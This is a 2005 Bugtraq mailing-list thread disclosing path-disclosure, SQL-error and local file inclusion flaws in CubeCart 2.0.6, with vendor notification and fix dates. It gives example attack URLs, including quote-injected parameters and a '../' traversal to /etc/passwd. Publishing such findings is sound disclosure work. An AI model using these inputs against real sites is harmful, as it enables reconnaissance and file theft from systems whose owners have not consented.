RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hi Ravish,
This only happens on older versions, it was fixed in 2.0.5. (see
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities)
The only other thing an attacker could do is to include a .php file
somewhere else on the server.
For example, if the attacker also had his/her website on that same server
and knew the full path to it, they could use file inclusion to launch an
'evil' .php file from there home folder.
Regards
John
www.NoBytes.com
Web Design, Web Hosting, Hardware, Software, You Name it, if its to do with
IT we can sort it.
-----Original Message-----
From: Ravish Ahuja [mailto:ravish@xxxxxxxxxxx]
Sent: 06 April 2005 20:44
To: 'John Cobb'; bugtraq@xxxxxxxxxxxxxxxxx
Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hello,
http://www.victimsite.com/index.php?&language=f00bar.php
Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147
This is path disclosure but it can also be used for malicious file include.
http://www.victimsite.com/index.php?language=../../../../../etc/passwd
Regards,
Ravish
http://www.xeonext.com
-----Original Message-----
From: John Cobb [mailto:johnc@xxxxxxxxxxx]
Sent: Sunday, February 06, 2005 11:09 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hello All,
I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.
Authors Site: http://www.cubecart.com
CubeCart is described by its authors as:
'What is CubeCart?
CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
http://www.victimsite.com/index.php?&language=f00bar.php
Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147
[2]------------------------------------------------------------+
http://www.victimsite.com/index.php?&PHPSESSID='
Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0
[3]------------------------------------------------------------+
http://www.victimsite.com/tellafriend.php?&product='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46
[4]------------------------------------------------------------+
http://www.victimsite.com/view_cart.php?add='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49
[5]------------------------------------------------------------+
http://www.victimsite.com/view_product.php?product='
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005
Regards
John Cobb
JohnC@xxxxxxxxxxx
http://www.NoBytes.com